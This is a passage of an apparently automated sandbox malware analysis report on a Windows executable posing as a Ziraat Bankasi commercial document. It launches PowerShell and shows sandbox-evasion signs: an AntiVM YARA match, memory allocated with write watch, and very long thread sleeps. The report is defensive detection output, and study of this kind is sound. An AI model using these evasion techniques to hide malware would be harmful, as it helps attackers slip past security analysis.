Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe PID: 6640, type: MEMORYSTR
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Memory allocated: FC0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Memory allocated: 2860000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Memory allocated: 2640000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Memory allocated: 79D0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Memory allocated: 89D0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Memory allocated: 8B90000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Memory allocated: 9B90000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Memory allocated: 18F0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Memory allocated: 3160000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Memory allocated: 2F80000 memory reserve | memory write watch Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 599765 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 599656 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 599547 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 599437 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 599328 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 599218 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 599109 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 599000 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 598890 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 598781 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 598671 Jump to behavior
